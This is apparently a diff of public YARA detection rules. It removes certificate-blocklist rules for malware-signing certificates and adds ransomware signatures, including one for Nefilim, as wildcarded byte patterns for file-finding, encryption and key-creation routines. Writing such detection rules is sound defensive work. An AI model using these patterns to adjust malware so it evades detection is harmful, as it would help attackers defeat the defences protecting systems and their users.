- tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_p1 = { + 8A 01 41 84 C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? 51 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? + ?? 8D 45 ?? 8B 5D ?? 83 FB ?? 8B 75 ?? 8B 4D ?? 0F 43 C6 83 F9 ?? 75 ?? 80 38 ?? 0F + 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? BA ?? ?? ?? ?? 66 39 10 0F + 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 66 81 3A ?? ?? 75 ?? 80 7A + ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 55 ?? 0F 43 D6 83 F9 ?? 75 ?? 81 3A ?? ?? ?? ?? 75 ?? + 66 81 7A ?? ?? ?? 75 ?? 80 7A ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 83 FB ?? 0F + 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 + EF ?? 73 ?? 8A 01 3A 02 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 F8 + ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF ?? 73 ?? + 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 FB ?? 8D 4D + ?? 0F 43 CE 83 F8 ?? 75 ?? BA ?? ?? ?? ?? 8D 78 ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 + ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? 8B 4D + ?? 8D 45 ?? 83 FB ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? + ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 + } + $find_files_p2 = { + 81 38 ?? ?? ?? ?? 75 ?? 80 78 ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 + F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? + 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 45 ?? 0F 43 C6 83 F9 ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? + 81 78 ?? ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? + 0F 43 CE 83 7D ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? + 83 C2 ?? 83 EF ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 0F 84 ?? ?? ?? ?? + 83 FB ?? 8D 45 ?? 0F 43 C6 83 7D ?? ?? 75 ?? 81 38 ?? ?? ?? ?? 75 ?? 81 78 ?? ?? ?? + ?? ?? 75 ?? 81 78 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 FB ?? 8D 4D ?? 0F 43 CE 83 7D + ?? ?? 75 ?? BA ?? ?? ?? ?? BF ?? ?? ?? ?? 8B 01 3B 02 75 ?? 83 C1 ?? 83 C2 ?? 83 EF + ?? 73 ?? 66 8B 01 66 3B 02 75 ?? 8A 41 ?? 3A 42 ?? 75 ?? B0 ?? EB ?? 32 C0 84 C0 75 + ?? 8D 85 ?? ?? ?? ?? 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? + ?? 8B CC 8B D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 + C4 ?? 8B 95 ?? ?? ?? ?? 83 FA ?? 72 ?? 8B 8D ?? ?? ?? ?? 42 8B C1 81 FA ?? ?? ?? ?? + 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? + ?? 83 C4 ?? 8B BD ?? ?? ?? ?? C6 45 ?? ?? 83 FB ?? 72 ?? 43 8B C6 81 FB ?? ?? ?? ?? + 72 ?? 8B 76 ?? 83 C3 ?? 2B C6 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 53 56 E8 ?? ?? ?? + ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 57 FF + 15 + } + $encrypt_files_p1 = { + 88 84 05 ?? ?? ?? ?? 40 3D ?? ?? ?? ?? 7C ?? 33 FF 33 F6 8B C6 8A 9C 35 ?? ?? ?? ?? + 99 F7 7D ?? 0F B6 04 0A 03 F8 0F B6 CB 03 F9 81 E7 ?? ?? ?? ?? 79 ?? 4F 81 CF ?? ?? + ?? ?? 47 8A 84 3D ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 88 84 35 ?? ?? ?? ?? 46 88 9C 3D ?? + ?? ?? ?? 81 FE ?? ?? ?? ?? 7C ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 + E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 0F 85 ?? ?? ?? ?? 8B 4D ?? 32 D2 E8 ?? ?? ?? ?? + 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 42 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? + 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C7 + 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 83 FA ?? 0F 82 ?? ?? ?? ?? 8B 4D + ?? 42 8B C1 81 FA ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 + F8 ?? 0F 87 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 + ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 89 BD ?? ?? ?? ?? 85 FF 0F 84 ?? ?? ?? ?? 33 F6 + 53 E8 ?? ?? ?? ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 + } + $encrypt_files_p2 = { + 0F BE 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 46 83 C4 ?? 83 FE ?? 7C ?? 53 E8 ?? ?? ?? + ?? 83 C4 ?? 88 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 83 + 7D ?? ?? 8D 4D ?? 8A 85 ?? ?? ?? ?? 0F 43 4D ?? C7 45 ?? ?? ?? ?? ?? 88 01 C6 41 ?? + ?? 33 C9 8B 75 ?? 8B C6 83 C0 ?? 0F 92 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 4D ?? 83 7D ?? ?? 8B F8 0F 43 4D ?? 56 57 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F BE + 07 FF B5 ?? ?? ?? ?? 35 ?? ?? ?? ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 8B + BD ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 57 E8 ?? ?? ?? ?? + 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D + 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 32 D2 C7 45 ?? ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 F8 ?? 0F 82 ?? ?? ?? ?? 8B 4D ?? 8D 50 ?? 8B C1 + 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? + ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D ?? + ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 + } + $misc_checks_p1 = { + 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 + ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 + ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 + F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? + ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F + 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 + } + $misc_checks_p2 = { + 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? ?? ?? B9 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? BA ?? ?? + ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? E8 ?? + ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? + BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? + ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? + 83 C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 + ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 F8 ?? 74 ?? 50 E8 ?? ?? ?? ?? 83 + C4 ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? + ?? ?? ?? FF 15 ?? ?? ?? ?? E9 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO \"MPS\"" and (pe.signatures[i].serial=="00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures[i].serial=="98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03") and 1575849600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($misc_checks_p*)) and ( all of ($find_files_p*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Nefilim : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Nefilim ransomware." author = "ReversingLabs" - id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e" - date = "2023-11-08" - modified = "2023-11-08" + id = "aec298c1-abf8-5446-9dbb-795f9fcf8e94" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3696-L3714" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Nefilim.yara#L1-L150" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "fae0350e51aee2777475d2222848b30fd39fa39ceea260132b0c7fbc536b3a86" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Nefilim" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BlueMarble GmbH" and (pe.signatures[i].serial=="00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures[i].serial=="86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32") and 1574791194<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L3716-L3732" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $create_encryption_key = { + 55 8B EC 51 A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 56 50 E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? + ?? 8B F0 A1 ?? ?? ?? ?? 59 89 75 ?? 73 ?? B8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 50 E8 ?? + ?? ?? ?? 33 F6 59 59 39 35 ?? ?? ?? ?? 75 ?? 53 57 8B 3D ?? ?? ?? ?? 56 6A ?? 56 BE + ?? ?? ?? ?? 56 BB ?? ?? ?? ?? 53 FF D7 85 C0 75 ?? 6A ?? 6A ?? 50 56 53 FF D7 85 C0 + 75 ?? 50 FF 15 ?? ?? ?? ?? 5F 33 F6 5B A1 ?? ?? ?? ?? C1 E8 ?? 6B C0 ?? 68 ?? ?? ?? + ?? 56 56 50 FF 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 EB ?? 5E C9 + C3 + } + $encrypt_encryption_key = { + 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? E8 + ?? ?? ?? ?? 83 78 ?? ?? 59 72 ?? 8B 00 53 56 57 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? + ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 75 ?? 89 45 ?? E8 ?? ?? ?? ?? 39 5D ?? 0F 84 + ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? BF ?? ?? ?? ?? 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B + C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 57 8B F0 FF D3 50 57 E8 ?? ?? + ?? ?? 59 59 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 89 45 ?? 8D 45 ?? 50 56 6A + ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 85 C0 75 ?? FF 15 ?? ?? ?? + ?? 8D 45 ?? 50 57 FF D3 99 83 E2 ?? 03 C2 C1 F8 ?? 6B C0 ?? 50 56 FF 75 ?? FF 15 ?? + ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? + 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 + } + $encrypt_files_p1 = { + 55 8B EC 83 E4 ?? 83 EC ?? A1 ?? ?? ?? ?? 33 C4 89 44 24 ?? 83 7D ?? ?? 8B 45 ?? 53 + 56 57 73 ?? 8D 45 ?? 33 DB 53 53 6A ?? 53 53 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 + 44 24 ?? 3B C3 0F 84 ?? ?? ?? ?? 8D 4C 24 ?? 51 50 FF 15 ?? ?? ?? ?? A1 ?? ?? ?? ?? + 6B C0 ?? 83 C0 ?? 83 F8 ?? 0F 8E ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 6A ?? 89 44 24 ?? + E8 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? BE + ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 56 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? + 89 44 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? 8B 54 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? + ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 7E ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? + 33 FF E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 53 53 FF 74 24 ?? FF 74 24 ?? + FF 74 24 ?? FF D7 53 FF 15 ?? ?? ?? ?? 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? + FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 + F8 ?? 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 53 03 C6 53 13 CB 51 50 FF 74 24 ?? + FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B + } + $encrypt_files_p2 = { + 4C 24 ?? 53 05 ?? ?? ?? ?? 53 13 CB 51 50 FF 74 24 ?? FF D7 53 E8 ?? ?? ?? ?? 0B C2 + 59 74 ?? 68 ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? + ?? ?? 8B 3D ?? ?? ?? ?? 53 8D 44 24 ?? 50 FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 74 + 24 ?? FF 15 ?? ?? ?? ?? 8B 44 24 ?? 8B 4C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 + ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 89 5C 24 ?? 89 5C 24 ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? + 3B CB 0F 86 ?? ?? ?? ?? BE ?? ?? ?? ?? EB ?? 8B 4C 24 ?? 2B 4C 24 ?? 1B 44 24 ?? 89 + 44 24 ?? 0F 88 ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 56 53 FF 15 ?? + ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 53 FF 74 24 ?? 89 44 24 ?? FF 74 24 ?? FF 74 24 ?? + FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B + 54 24 ?? 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 FF 74 24 ?? FF 74 24 ?? FF + 74 24 ?? FF D7 53 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 15 + ?? ?? ?? ?? FF 74 24 ?? 53 50 FF 15 ?? ?? ?? ?? 81 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? + 11 5C 24 ?? 39 44 24 ?? 0F 8C ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? 8B 4C 24 ?? 39 4C 24 ?? + 0F 82 ?? ?? ?? ?? E9 ?? ?? ?? ?? 3B C3 0F 8C ?? ?? ?? ?? 7F ?? 81 F9 ?? ?? ?? ?? 0F + } + $encrypt_files_p3 = { + 86 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 E8 ?? ?? + ?? ?? 59 89 44 24 ?? FF 15 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 FF 74 24 ?? FF D7 53 + 8D 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 8B 4C 24 ?? 8B 54 24 ?? + 51 56 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 50 FF 74 24 ?? FF D7 53 8D + 44 24 ?? 50 56 FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? + 59 E9 ?? ?? ?? ?? 51 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? FF 15 ?? + ?? ?? ?? 53 53 33 C0 50 53 FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 + ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 8B 4C 24 + ?? 8B 54 24 ?? 51 FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 53 33 C0 50 53 + FF 74 24 ?? FF D7 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 24 ?? FF 74 24 ?? FF 15 ?? ?? + ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? + E8 ?? ?? ?? ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? + E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? FF 74 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 8D 45 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 72 ?? 8B 00 83 7D ?? ?? 8B + 4D ?? 73 ?? 8D 4D ?? 50 51 FF 15 ?? ?? ?? ?? 6A ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? + 6A ?? 33 FF 8D 75 ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 + 5D C3 + } + $find_files_1 = { + 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 56 + 57 6A ?? 5E 33 C0 33 FF 6A ?? 66 89 44 24 ?? 57 8D 45 ?? 8D 4C 24 ?? 89 74 24 ?? 89 + 7C 24 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 66 + 89 44 24 ?? 66 89 44 24 ?? 8B 84 24 ?? ?? ?? ?? 03 44 24 ?? 8D 4C 24 ?? 89 74 24 ?? + 89 7C 24 ?? 89 74 24 ?? 89 7C 24 ?? E8 ?? ?? ?? ?? 57 8D 44 24 ?? 50 83 C8 ?? 8D 74 + 24 ?? E8 ?? ?? ?? ?? 57 8D 84 24 ?? ?? ?? ?? 50 83 C8 ?? E8 ?? ?? ?? ?? 8B DE 8D 44 + 24 ?? E8 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 7C 24 ?? ?? 8B 44 24 ?? 73 ?? 8D 44 24 + ?? 8D 8C 24 ?? ?? ?? ?? 51 50 FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? + ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 + } + $find_files_2 = { + D6 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? F6 + 84 24 ?? ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 8D 4C 24 ?? 8D 44 24 ?? 74 ?? E8 ?? ?? + ?? ?? 8D 4C 24 ?? 51 E8 ?? ?? ?? ?? 59 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A ?? 33 + FF 8D 74 24 ?? E8 ?? ?? ?? ?? 6A ?? 8D 74 24 ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 21 79 + ?? 33 C0 6A ?? C7 41 ?? ?? ?? ?? ?? 66 89 01 50 8D 44 24 ?? E8 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D8 59 8D 44 24 ?? E8 ?? ?? ?? ?? 6A + ?? 33 FF 8D 74 24 ?? E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 50 8D + 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 6A ?? 5F 39 7C 24 ?? 73 ?? 8D 44 24 ?? 8B 35 ?? + ?? ?? ?? 68 + } + $find_files_3 = { + 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ?? + ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 + ?? ?? ?? ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 + ?? 68 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 + ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? 8B 44 24 ?? 39 7C 24 ?? 73 ?? 8D 44 24 ?? 68 ?? ?? + ?? ?? 50 FF D6 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 85 C0 74 ?? + 8B 4C 24 ?? 39 